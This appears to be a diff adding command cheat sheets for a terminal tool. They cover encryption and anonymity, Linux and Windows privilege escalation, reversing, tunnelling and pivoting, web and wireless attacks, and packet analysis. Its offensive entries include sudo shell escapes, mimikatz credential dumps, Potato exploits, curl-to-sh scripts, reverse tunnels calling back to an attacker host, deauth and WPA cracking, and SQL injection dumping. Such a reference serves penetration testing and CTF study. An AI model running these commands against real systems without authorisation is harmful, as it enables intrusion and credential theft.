 # Encrypt file with GPG (symmetric)
 gpg -c <file>
 # Encrypt file for recipient
 gpg -e -r <recipient_email> <file>
 # Decrypt GPG file
 gpg -d <file.gpg> > <output_file>
 # Sign a file
 gpg --sign <file>
 # Verify signature
 gpg --verify <file.sig>
 # Age encryption - generate key
 age-keygen -o key.txt
 # Age encrypt file
 age -r <public_key> -o <file.age> <file>
 # Age decrypt file
 age -d -i key.txt -o <output> <file.age>
 # Age encrypt with passphrase
 age -p -o <file.age> <file>
 # Start Tor service
 sudo systemctl start tor
 # Check Tor status
 sudo systemctl status tor
 # Torify a command
 torify <command>
 # Use torsocks
 torsocks curl https://check.torproject.org
 # Get new Tor circuit
 sudo killall -HUP tor
 # Check if using Tor
 curl --socks5 localhost:9050 https://check.torproject.org/api/ip
 # I2P - start router
 i2prouter start
 # I2P - check status
 i2prouter status
 # Secure delete file (shred)
 shred -vfz -n 5 <file>
 # Secure delete with srm
 srm -vz <file>
 # Wipe free space
 sfill -v <mountpoint>
 # BleachBit clean
 bleachbit --clean system.cache system.tmp
 # Veracrypt create volume
 veracrypt -t -c
 # Veracrypt mount volume
 veracrypt <volume_file> <mount_point>
 # Veracrypt dismount
 veracrypt -d <mount_point>
 # Check for listening services
 ss -tulpn
 # Block all incoming (UFW)
 sudo ufw default deny incoming && sudo ufw enable
 # MAC address randomization
 sudo macchanger -r <interface>
 # Reset MAC to permanent
 sudo macchanger -p <interface>
 # DNS over HTTPS test
 curl -H 'accept: application/dns-json' 'https://cloudflare-dns.com/dns-query?name=example.com&type=A'
 # Check DNS leaks
 curl https://dnsleaktest.com/
 # Metadata removal from image
 exiftool -all= <image>
 # Metadata removal from PDF
 exiftool -all:all= <pdf>
 # MAT2 metadata removal
 mat2 <file>
 # Check what metadata exists
 exiftool <file>
 $ key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
 $ recipient_email: echo ""
 $ file: find . -type f -maxdepth 1 2>/dev/null | head -20
 $ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
 $ mount_point: echo "/mnt/veracrypt"
 $ public_key: echo "age1..."
--- a/privesc-linux.cheat
+++ b/privesc-linux.cheat
@ -0,0 +1,71 @@
 % privesc, linux, escalation
 # Find SUID binaries
 find / -perm -4000 -type f 2>/dev/null
 # Find SGID binaries
 find / -perm -2000 -type f 2>/dev/null
 # Check sudo permissions
 sudo -l
 # Find writable directories
 find / -writable -type d 2>/dev/null
 # Find world-writable files
 find / -perm -o+w -type f 2>/dev/null
 # Check cron jobs
 cat /etc/crontab
 ls -la /etc/cron*
 crontab -l
 # Find capabilities
 getcap -r / 2>/dev/null
 # Check for docker group
 id | grep docker
 # Check kernel version (for exploits)
 uname -a
 # Check OS version
 cat /etc/os-release
 # LinPEAS
 curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
 # LinEnum
 ./LinEnum.sh -t
 # Check passwd file writable
 ls -la /etc/passwd
 # Check shadow file readable
 ls -la /etc/shadow
 # Find password files
 find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
 # Check NFS exports (no_root_squash)
 cat /etc/exports
 # Find SSH keys
 find / -name "id_rsa" 2>/dev/null
 find / -name "authorized_keys" 2>/dev/null
 # Check PATH hijacking
 echo $PATH
 ls -la /usr/local/bin
 # GTFOBins sudo bypass - vim
 sudo vim -c ':!/bin/sh'
 # GTFOBins sudo bypass - find
 sudo find . -exec /bin/sh \; -quit
 # GTFOBins sudo bypass - awk
 sudo awk 'BEGIN {system("/bin/sh")}'
 # GTFOBins SUID - python
 ./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
--- a/privesc-windows.cheat
+++ b/privesc-windows.cheat
@ -0,0 +1,83 @@
 % privesc, windows, escalation
 # System info
 systeminfo
 # Current user privileges
 whoami /priv
 # Current user groups
 whoami /groups
 # All users
 net user
 # User details
 net user <username>
 # Local groups
 net localgroup
 # Administrators group
 net localgroup administrators
 # Running services
 wmic service list brief
 # Installed patches
 wmic qfe list
 # Scheduled tasks
 schtasks /query /fo LIST /v
 # Find unquoted service paths
 wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
 # Find writable service directories
 icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
 # AlwaysInstallElevated check
 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 # Stored credentials
 cmdkey /list
 # SAM and SYSTEM backup
 dir C:\Windows\Repair\SAM
 dir C:\Windows\System32\config\RegBack\SAM
 # PowerUp
 Import-Module .\PowerUp.ps1; Invoke-AllChecks
 # WinPEAS
 .\winPEASany.exe
 # Juicy Potato (SeImpersonate)
 .\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\shell.exe" -t *
 # PrintSpoofer (SeImpersonate)
 .\PrintSpoofer.exe -i -c cmd
 # GodPotato (SeImpersonate)
 .\GodPotato.exe -cmd "cmd /c whoami"
 # Search for passwords in files
 findstr /si password *.txt *.ini *.config
 # Search registry for passwords
 reg query HKLM /f password /t REG_SZ /s
 reg query HKCU /f password /t REG_SZ /s
 # Check saved WiFi passwords
 netsh wlan show profiles
 netsh wlan show profile name="<wifi_name>" key=clear
 # Dump SAM with mimikatz
 mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
 # Dump credentials with mimikatz
 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
 $ username: echo ""
 $ wifi_name: echo ""
--- a/reversing.cheat
+++ b/reversing.cheat
@ -0,0 +1,127 @@
 % reversing, reverse-engineering, ghidra, radare2, gdb, binary
 # Ghidra - start GUI
 ghidraRun
 # Ghidra - analyze headless
 analyzeHeadless <project_dir> <project_name> -import <binary> -postScript <script>
 # radare2 - open binary
 r2 <binary>
 # radare2 - analyze all
 r2 -A <binary>
 # radare2 - analyze and open
 r2 -AA <binary>
 # r2 commands (inside r2):
 # aaa     - analyze all
 # afl     - list functions
 # pdf     - print disassembly of function
 # s main  - seek to main
 # VV      - visual graph mode
 # px 100  - print hex
 # iz      - list strings in data section
 # ii      - list imports
 # ie      - list entry points
 # radare2 - list functions
 r2 -qc 'aaa; afl' <binary>
 # radare2 - list strings
 r2 -qc 'iz' <binary>
 # radare2 - disassemble main
 r2 -qc 'aaa; s main; pdf' <binary>
 # GDB - start debugging
 gdb <binary>
 # GDB - run with args
 gdb --args <binary> <arg1> <arg2>
 # GDB commands:
 # r           - run
 # b main      - breakpoint at main
 # b *0x401000 - breakpoint at address
 # c           - continue
 # n           - next (step over)
 # s           - step (step into)
 # p $eax      - print register
 # x/10x $esp  - examine memory
 # info reg    - show registers
 # disas       - disassemble current function
 # bt          - backtrace
 # q           - quit
 # GDB with pwndbg/gef (enhanced)
 gdb -q <binary>
 # objdump - disassemble
 objdump -d <binary>
 # objdump - all headers
 objdump -x <binary>
 # objdump - disassemble with source
 objdump -S <binary>
 # readelf - file header
 readelf -h <binary>
 # readelf - sections
 readelf -S <binary>
 # readelf - symbols
 readelf -s <binary>
 # readelf - program headers
 readelf -l <binary>
 # nm - list symbols
 nm <binary>
 # nm - dynamic symbols
 nm -D <binary>
 # strings - extract strings
 strings <binary>
 strings -n 10 <binary>
 # file - identify binary type
 file <binary>
 # ldd - list shared libraries
 ldd <binary>
 # strace - trace syscalls
 strace <binary>
 strace -f <binary>
 # ltrace - trace library calls
 ltrace <binary>
 # Cutter - r2 GUI
 cutter <binary>
 # Binary Ninja (commercial)
 binaryninja <binary>
 # IDA Free
 ida64 <binary>
 # checksec - binary protections
 checksec --file=<binary>
 # ROPgadget - find gadgets
 ROPgadget --binary <binary>
 # pwntools (Python)
 # from pwn import *
 # elf = ELF('<binary>')
 $ binary: find . -type f -executable 2>/dev/null | head -10
 $ project_dir: echo "/tmp/ghidra_projects"
 $ project_name: echo "analysis"
 $ script: echo ""
--- a/secure-comms.cheat
+++ b/secure-comms.cheat
@ -0,0 +1,129 @@
 % comms, signal, matrix, encrypted, messaging
 # Signal CLI - register
 signal-cli -u <phone_number> register
 # Signal CLI - verify
 signal-cli -u <phone_number> verify <code>
 # Signal CLI - send message
 signal-cli -u <phone_number> send -m "<message>" <recipient>
 # Signal CLI - send to group
 signal-cli -u <phone_number> send -m "<message>" -g <group_id>
 # Signal CLI - receive messages
 signal-cli -u <phone_number> receive
 # Signal CLI - list groups
 signal-cli -u <phone_number> listGroups
 # Signal CLI - create group
 signal-cli -u <phone_number> createGroup -n "<group_name>" -m <member1> <member2>
 # Signal CLI - daemon mode
 signal-cli -u <phone_number> daemon
 # Matrix - login with element-cli
 element-cli login <homeserver> <username> <password>
 # Matrix - send message (Python SDK)
 # pip install matrix-nio
 # See nio documentation
 # Matrix CLI - gomuks (TUI client)
 gomuks
 # Matrix CLI - matrixcli
 matrixcli -s <homeserver> -u <username> send <room_id> "<message>"
 # SimpleX Chat - start
 simplex-chat
 # Briar - desktop
 briar-desktop
 # Session messenger
 session-desktop
 # Keybase - login
 keybase login
 # Keybase - send message
 keybase chat send <username> "<message>"
 # Keybase - encrypt file
 keybase encrypt <username> -i <input_file> -o <output_file>
 # Keybase - decrypt file
 keybase decrypt -i <input_file> -o <output_file>
 # Keybase - sign file
 keybase sign -i <input_file> -o <output_file.sig>
 # Keybase - verify signature
 keybase verify -i <file.sig>
 # GPG - encrypt for recipient
 gpg -e -r <recipient> <file>
 # GPG - sign and encrypt
 gpg -se -r <recipient> <file>
 # GPG - decrypt
 gpg -d <file.gpg>
 # age - encrypt for recipient
 age -r <public_key> -o <output.age> <input_file>
 # age - encrypt with passphrase
 age -p -o <output.age> <input_file>
 # age - decrypt
 age -d -i <key_file> -o <output> <input.age>
 # OnionShare - share files over Tor
 onionshare-cli <file>
 # OnionShare - receive files
 onionshare-cli --receive
 # OnionShare - chat
 onionshare-cli --chat
 # Magic Wormhole - send file
 wormhole send <file>
 # Magic Wormhole - receive
 wormhole receive <code>
 # Croc - send file
 croc send <file>
 # Croc - receive
 croc <code>
 # XMPP with profanity
 profanity
 # IRC with weechat (+ OTR)
 weechat
 # Ricochet Refresh (Tor messenger)
 ricochet-refresh
 $ phone_number: echo "+1234567890"
 $ recipient: echo "+1234567890"
 $ code: echo ""
 $ message: echo ""
 $ group_id: echo ""
 $ group_name: echo ""
 $ homeserver: echo "https://matrix.org"
 $ username: echo ""
 $ password: echo ""
 $ room_id: echo ""
 $ public_key: echo "age1..."
 $ key_file: echo "key.txt"
 $ input_file: find . -type f 2>/dev/null | head -10
 $ output_file: echo "encrypted"
 $ file: find . -type f 2>/dev/null | head -10
--- a/solidity.cheat
+++ b/solidity.cheat
@ -0,0 +1,129 @@
 % solidity, audit, smartcontract, ethereum, foundry
 # Foundry - create new project
 forge init <project_name>
 # Foundry - build/compile
 forge build
 # Foundry - run tests
 forge test
 # Foundry - run tests verbose
 forge test -vvvv
 # Foundry - run specific test
 forge test --match-test <test_name>
 # Foundry - gas report
 forge test --gas-report
 # Foundry - coverage
 forge coverage
 # Foundry - deploy contract
 forge create <contract> --rpc-url <rpc_url> --private-key <private_key>
 # Foundry - verify contract
 forge verify-contract <address> <contract> --chain <chain_id>
 # Cast - call read function
 cast call <contract_address> "<function_sig>" --rpc-url <rpc_url>
 # Cast - send transaction
 cast send <contract_address> "<function_sig>" --rpc-url <rpc_url> --private-key <private_key>
 # Cast - decode calldata
 cast calldata-decode "<function_sig>" <calldata>
 # Cast - get storage slot
 cast storage <contract_address> <slot> --rpc-url <rpc_url>
 # Cast - keccak256 hash
 cast keccak "<text>"
 # Cast - convert to wei
 cast to-wei <amount> ether
 # Cast - convert from wei
 cast from-wei <amount>
 # Slither - full analysis
 slither <contract_or_dir>
 # Slither - specific detectors
 slither <contract> --detect <detector>
 # Slither - print contract summary
 slither <contract> --print contract-summary
 # Slither - print function summary
 slither <contract> --print function-summary
 # Slither - print inheritance
 slither <contract> --print inheritance-graph
 # Slither - human summary
 slither <contract> --print human-summary
 # Slither - list detectors
 slither --list-detectors
 # Mythril - analyze contract
 myth analyze <contract.sol>
 # Mythril - analyze deployed contract
 myth analyze --address <contract_address> --rpc <rpc_url>
 # Mythril - execution timeout
 myth analyze <contract.sol> --execution-timeout 300
 # Echidna - fuzz testing
 echidna <contract.sol> --contract <contract_name>
 # Echidna - with config
 echidna <contract.sol> --contract <contract_name> --config echidna.yaml
 # Aderyn - static analysis (Rust-based, fast)
 aderyn <contract_or_dir>
 # Solhint - linter
 solhint <contract.sol>
 # Solhint - init config
 solhint --init
 # Common vulnerability patterns to check:
 # - Reentrancy (external calls before state changes)
 # - Integer overflow/underflow (pre-0.8.0)
 # - Unchecked return values
 # - Access control issues
 # - Front-running susceptibility
 # - Oracle manipulation
 # - Flash loan attacks
 # - Delegate call to untrusted contract
 # Check for selfdestruct
 grep -rn "selfdestruct\|suicide" <dir>
 # Check for delegatecall
 grep -rn "delegatecall" <dir>
 # Check for tx.origin
 grep -rn "tx.origin" <dir>
 # Check for inline assembly
 grep -rn "assembly" <dir>
 $ project_name: echo "my_project"
 $ contract: find . -name "*.sol" 2>/dev/null | head -10
 $ contract_or_dir: echo "."
 $ contract_address: echo "0x..."
 $ rpc_url: echo "https://eth-mainnet.g.alchemy.com/v2/YOUR_KEY"
 $ private_key: echo ""
 $ function_sig: echo "balanceOf(address)"
 $ test_name: echo "test"
 $ detector: echo "reentrancy-eth\nreentrancy-no-eth\narbitrary-send\nsuicide\nuninitialized-storage"
 $ chain_id: echo "1\n5\n137\n42161" --- --header "1=mainnet, 5=goerli, 137=polygon, 42161=arbitrum"
 $ slot: echo "0"
 $ dir: echo "src/"
--- a/steganography.cheat
+++ b/steganography.cheat
@ -0,0 +1,117 @@
 % steganography, stego, hidden, ctf
 # steghide - extract hidden data
 steghide extract -sf <image>
 # steghide - extract with password
 steghide extract -sf <image> -p <password>
 # steghide - embed data
 steghide embed -cf <cover_image> -ef <secret_file>
 # steghide - info about file
 steghide info <image>
 # stegseek - crack steghide password
 stegseek <image> <wordlist>
 # stegseek - without wordlist (rockyou default)
 stegseek <image>
 # zsteg - PNG/BMP analysis
 zsteg <image>
 # zsteg - all checks
 zsteg -a <image>
 # binwalk - scan for embedded files
 binwalk <file>
 # binwalk - extract embedded files
 binwalk -e <file>
 # binwalk - extract with matryoshka
 binwalk -eM <file>
 # foremost - file carving
 foremost -i <file> -o <output_dir>
 # exiftool - view all metadata
 exiftool <file>
 # exiftool - view specific tag
 exiftool -Comment <file>
 # strings - find hidden text
 strings <file>
 strings -n 10 <file>
 # xxd - hex dump
 xxd <file> | head -50
 # Check file magic bytes
 xxd -l 16 <file>
 file <file>
 # pngcheck - PNG structure
 pngcheck -v <image>
 # stegoveritas - multiple stego checks
 stegoveritas <image>
 # openstego - extract (GUI tool)
 openstego extract -sf <image> -xd <output_dir>
 # outguess - extract
 outguess -r <image> <output_file>
 # jsteg - JPEG steganography
 jsteg reveal <image>
 # Audio steganography - Audacity
 # Open in Audacity, check spectrogram view
 # Audio steganography - sonic-visualiser
 sonic-visualiser <audio_file>
 # LSB extraction with Python
 # from PIL import Image
 # img = Image.open('image.png')
 # Extract least significant bits
 # Check for appended data
 # Compare file size to expected size
 # Look for data after EOF marker
 # SNOW - whitespace steganography
 snow -C <text_file>
 # stegsnow - extract from whitespace
 stegsnow -C <text_file>
 # PDF steganography - check streams
 pdf-parser <pdf_file>
 pdftotext <pdf_file>
 # QR code extraction
 zbarimg <image>
 # Common CTF stego workflow:
 # 1. file / xxd - identify type
 # 2. exiftool - check metadata
 # 3. strings - hidden text
 # 4. binwalk - embedded files
 # 5. steghide/stegseek - hidden data
 # 6. zsteg - LSB for PNG
 $ image: find . -name "*.jpg" -o -name "*.png" -o -name "*.bmp" 2>/dev/null | head -10
 $ file: find . -type f 2>/dev/null | head -10
 $ cover_image: find . -name "*.jpg" 2>/dev/null | head -5
 $ secret_file: echo "secret.txt"
 $ password: echo ""
 $ wordlist: echo "/usr/share/wordlists/rockyou.txt"
 $ output_dir: echo "extracted"
 $ output_file: echo "output.txt"
 $ text_file: find . -name "*.txt" 2>/dev/null | head -5
 $ audio_file: find . -name "*.wav" -o -name "*.mp3" 2>/dev/null | head -5
 $ pdf_file: find . -name "*.pdf" 2>/dev/null | head -5
--- a/tunnels.cheat
+++ b/tunnels.cheat
@ -0,0 +1,114 @@
 % tunnels, ssh, pivoting, portforward, proxy
 # SSH local port forward
 ssh -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
 # SSH remote port forward
 ssh -R <remote_port>:<local_host>:<local_port> <user>@<remote_host>
 # SSH dynamic SOCKS proxy
 ssh -D <socks_port> <user>@<host>
 # SSH with ProxyJump (bastion)
 ssh -J <user>@<jump_host> <user>@<target_host>
 # SSH tunnel background
 ssh -fN -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
 # SSH reverse tunnel (callback)
 ssh -fN -R <remote_port>:localhost:22 <user>@<attacker_host>
 # Chisel server (on attacker)
 chisel server -p <port> --reverse
 # Chisel client reverse SOCKS
 chisel client <attacker_ip>:<port> R:socks
 # Chisel client port forward
 chisel client <attacker_ip>:<port> R:<remote_port>:<target_host>:<target_port>
 # Chisel client local forward
 chisel client <server_ip>:<port> <local_port>:<target_host>:<target_port>
 # Ligolo-ng proxy (attacker)
 ./proxy -selfcert
 # Ligolo-ng agent (victim)
 ./agent -connect <attacker_ip>:11601 -ignore-cert
 # Socat port forward
 socat TCP-LISTEN:<local_port>,fork TCP:<target_host>:<target_port>
 # Socat file transfer
 # Receiver:
 socat TCP-LISTEN:<port>,fork file:<output_file>,create
 # Sender:
 socat TCP:<target>:<port> file:<input_file>
 # Netcat relay
 nc -lvp <port1> | nc <target> <port2>
 # Proxychains with nmap
 proxychains nmap -sT -Pn <target>
 # Proxychains any command
 proxychains <command>
 # Edit proxychains config
 # /etc/proxychains4.conf
 # socks5 127.0.0.1 1080
 # WireGuard - generate keys
 wg genkey | tee privatekey | wg pubkey > publickey
 # WireGuard - quick up
 wg-quick up <interface>
 # WireGuard - quick down
 wg-quick down <interface>
 # WireGuard - show status
 wg show
 # sshuttle - VPN over SSH
 sshuttle -r <user>@<host> <network_cidr>
 # sshuttle - all traffic
 sshuttle -r <user>@<host> 0/0
 # Metasploit portfwd
 # portfwd add -l <local> -p <remote_port> -r <target>
 # Meterpreter autoroute
 # run autoroute -s <subnet>
 # plink (Windows SSH)
 plink.exe -L <local_port>:<target>:<target_port> <user>@<host>
 # netsh port forward (Windows)
 netsh interface portproxy add v4tov4 listenport=<local_port> listenaddress=0.0.0.0 connectport=<target_port> connectaddress=<target_host>
 # netsh show forwards
 netsh interface portproxy show all
 # netsh delete forward
 netsh interface portproxy delete v4tov4 listenport=<local_port> listenaddress=0.0.0.0
 $ local_port: echo "8080"
 $ target_host: echo ""
 $ target_port: echo "80"
 $ user: echo ""
 $ jump_host: echo ""
 $ remote_host: echo ""
 $ remote_port: echo "9999"
 $ local_host: echo "127.0.0.1"
 $ socks_port: echo "1080"
 $ host: echo ""
 $ attacker_ip: echo ""
 $ attacker_host: echo ""
 $ port: echo "8080"
 $ server_ip: echo ""
 $ network_cidr: echo "10.0.0.0/24"
 $ interface: echo "wg0"
 $ output_file: echo "received_file"
 $ input_file: find . -type f 2>/dev/null | head -5
--- a/web.cheat
+++ b/web.cheat
@ -0,0 +1,59 @@
 % web, webapp, burp, fuzzing
 # Directory fuzzing with ffuf
 ffuf -u http://<target>/FUZZ -w <wordlist>
 # Directory fuzzing with extensions
 ffuf -u http://<target>/FUZZ -w <wordlist> -e .php,.html,.txt,.bak
 # Subdomain fuzzing
 ffuf -u http://FUZZ.<domain> -w <wordlist> -H "Host: FUZZ.<domain>"
 # POST parameter fuzzing
 ffuf -u http://<target>/login -X POST -d "username=admin&password=FUZZ" -w <wordlist>
 # Filter by status code
 ffuf -u http://<target>/FUZZ -w <wordlist> -fc 404
 # Filter by response size
 ffuf -u http://<target>/FUZZ -w <wordlist> -fs 0
 # Gobuster directory scan
 gobuster dir -u http://<target> -w <wordlist>
 # Gobuster with extensions
 gobuster dir -u http://<target> -w <wordlist> -x php,html,txt
 # Nikto scan
 nikto -h http://<target>
 # WhatWeb (technology detection)
 whatweb http://<target>
 # SQLMap basic
 sqlmap -u "http://<target>/page.php?id=1" --batch
 # SQLMap dump database
 sqlmap -u "http://<target>/page.php?id=1" --dbs --batch
 # SQLMap dump tables
 sqlmap -u "http://<target>/page.php?id=1" -D <database> --tables --batch
 # XSS test payload
 <script>alert('XSS')</script>
 # Curl with POST data
 curl -X POST http://<target>/login -d "username=admin&password=test" -v
 # Curl with cookies
 curl http://<target> -b "session=<cookie>"
 # Curl with headers
 curl http://<target> -H "Authorization: Bearer <token>"
 $ target: echo ""
 $ domain: echo ""
 $ wordlist: echo "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
 $ database: echo ""
 $ cookie: echo ""
 $ token: echo ""
--- a/wireless.cheat
+++ b/wireless.cheat
@ -0,0 +1,89 @@
 % wireless, wifi, aircrack, wpa, hacking
 # Check wireless interfaces
 iwconfig
 # Kill interfering processes
 sudo airmon-ng check kill
 # Start monitor mode
 sudo airmon-ng start <interface>
 # Stop monitor mode
 sudo airmon-ng stop <monitor_interface>
 # Scan for networks
 sudo airodump-ng <monitor_interface>
 # Target specific network (capture handshake)
 sudo airodump-ng -c <channel> --bssid <bssid> -w <output_prefix> <monitor_interface>
 # Deauth attack (force handshake)
 sudo aireplay-ng -0 <count> -a <bssid> -c <client_mac> <monitor_interface>
 # Deauth broadcast (all clients)
 sudo aireplay-ng -0 <count> -a <bssid> <monitor_interface>
 # Crack WPA/WPA2 handshake
 aircrack-ng -w <wordlist> -b <bssid> <capture_file>
 # Crack with hashcat (faster - convert first)
 cap2hccapx <capture_file> output.hccapx
 hashcat -m 22000 output.hccapx <wordlist>
 # PMKID attack (no handshake needed)
 sudo hcxdumptool -i <monitor_interface> -o pmkid.pcapng --enable_status=1
 # Convert PMKID for hashcat
 hcxpcapngtool -o hash.22000 pmkid.pcapng
 hashcat -m 22000 hash.22000 <wordlist>
 # Fake AP with hostapd-wpe
 sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
 # WPS attack with reaver
 sudo reaver -i <monitor_interface> -b <bssid> -vv
 # WPS attack with bully
 sudo bully -b <bssid> -c <channel> <monitor_interface>
 # Pixie dust attack (WPS)
 sudo reaver -i <monitor_interface> -b <bssid> -vv -K 1
 # Wifite - automated attacks
 sudo wifite
 # Wifite - WPA only
 sudo wifite --wpa
 # Check if handshake captured
 aircrack-ng <capture_file>
 # Create wordlist from AP info
 crunch 8 8 -t <ssid>%%%% -o custom_wordlist.txt
 # Wash - find WPS enabled APs
 sudo wash -i <monitor_interface>
 # Fern WiFi Cracker (GUI)
 sudo fern-wifi-cracker
 # Kismet - wireless detection
 kismet
 # Show saved WiFi passwords (Linux)
 sudo cat /etc/NetworkManager/system-connections/* | grep psk=
 # Show saved WiFi passwords (Windows)
 netsh wlan show profile name="<ssid>" key=clear
 $ interface: iw dev | grep Interface | awk '{print $2}'
 $ monitor_interface: iw dev | grep Interface | awk '{print $2}' | head -1
 $ channel: echo "1\n6\n11"
 $ bssid: echo ""
 $ client_mac: echo ""
 $ output_prefix: echo "capture"
 $ capture_file: find . -name "*.cap" -o -name "*.pcap" 2>/dev/null
 $ wordlist: echo "/usr/share/wordlists/rockyou.txt"
 $ count: echo "5\n10\n0" --- --header "0=continuous"
 $ ssid: echo ""
--- a/wireshark.cheat
+++ b/wireshark.cheat
@ -0,0 +1,94 @@
 % wireshark, tshark, tcpdump, packets, network-analysis
 # Wireshark - open GUI
 wireshark
 # Wireshark - open specific file
 wireshark <pcap_file>
 # tshark - capture on interface
 sudo tshark -i <interface>
 # tshark - capture to file
 sudo tshark -i <interface> -w <output_pcap>
 # tshark - read pcap file
 tshark -r <pcap_file>
 # tshark - filter by IP
 tshark -r <pcap_file> -Y "ip.addr == <ip>"
 # tshark - filter by port
 tshark -r <pcap_file> -Y "tcp.port == <port>"
 # tshark - HTTP traffic only
 tshark -r <pcap_file> -Y "http"
 # tshark - DNS traffic only
 tshark -r <pcap_file> -Y "dns"
 # tshark - follow TCP stream
 tshark -r <pcap_file> -z follow,tcp,ascii,<stream_number>
 # tshark - extract HTTP objects
 tshark -r <pcap_file> --export-objects http,<output_dir>
 # tshark - show conversations
 tshark -r <pcap_file> -z conv,tcp
 # tshark - protocol hierarchy
 tshark -r <pcap_file> -z io,phs
 # tshark - credentials (basic)
 tshark -r <pcap_file> -Y "http.authorization or ftp.request.command == USER or ftp.request.command == PASS"
 # tcpdump - capture on interface
 sudo tcpdump -i <interface>
 # tcpdump - capture to file
 sudo tcpdump -i <interface> -w <output_pcap>
 # tcpdump - read pcap
 tcpdump -r <pcap_file>
 # tcpdump - filter by host
 sudo tcpdump -i <interface> host <ip>
 # tcpdump - filter by port
 sudo tcpdump -i <interface> port <port>
 # tcpdump - filter by network
 sudo tcpdump -i <interface> net <network_cidr>
 # tcpdump - verbose with hex
 sudo tcpdump -i <interface> -XX -vv
 # tcpdump - no DNS resolution
 sudo tcpdump -i <interface> -n
 # Common Wireshark display filters:
 # ip.addr == 192.168.1.1
 # tcp.port == 443
 # http.request.method == "POST"
 # dns.qry.name contains "evil"
 # tcp.flags.syn == 1 and tcp.flags.ack == 0
 # frame contains "password"
 # ssl.handshake.type == 1
 # Extract files from pcap with binwalk
 binwalk -e <pcap_file>
 # NetworkMiner (GUI) - extract artifacts
 networkminer <pcap_file>
 # Zeek - generate logs from pcap
 zeek -r <pcap_file>
 $ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
 $ pcap_file: find . -name "*.pcap" -o -name "*.pcapng" 2>/dev/null
 $ output_pcap: echo "capture.pcap"
 $ ip: echo ""
 $ port: echo "80\n443\n22\n21\n53"
 $ network_cidr: echo "192.168.1.0/24"
 $ stream_number: echo "0"
 $ output_dir: echo "extracted"